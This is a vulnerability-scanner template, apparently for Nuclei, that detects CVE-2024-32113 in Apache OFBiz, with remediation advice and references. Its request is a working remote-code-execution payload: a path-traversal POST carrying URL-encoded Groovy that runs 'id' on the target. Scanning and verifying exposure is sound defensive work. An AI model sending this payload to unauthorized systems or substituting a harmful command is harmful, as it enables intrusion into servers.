49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2024-32113
|
|
|
|
info:
|
|
name: Apache OFBiz Directory Traversal - Remote Code Execution
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
|
|
remediation: |
|
|
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
|
|
reference:
|
|
- https://issues.apache.org/jira/browse/OFBIZ-13006
|
|
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
|
|
- https://ofbiz.apache.org/download.html
|
|
- https://ofbiz.apache.org/security.html
|
|
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
|
|
classification:
|
|
cve-id: CVE-2024-32113
|
|
epss-score: 0.00115
|
|
epss-percentile: 0.45112
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="Apache_OFBiz"
|
|
tags: cve,cve2024,apache,obiz,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "java.lang.Exception:"
|
|
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|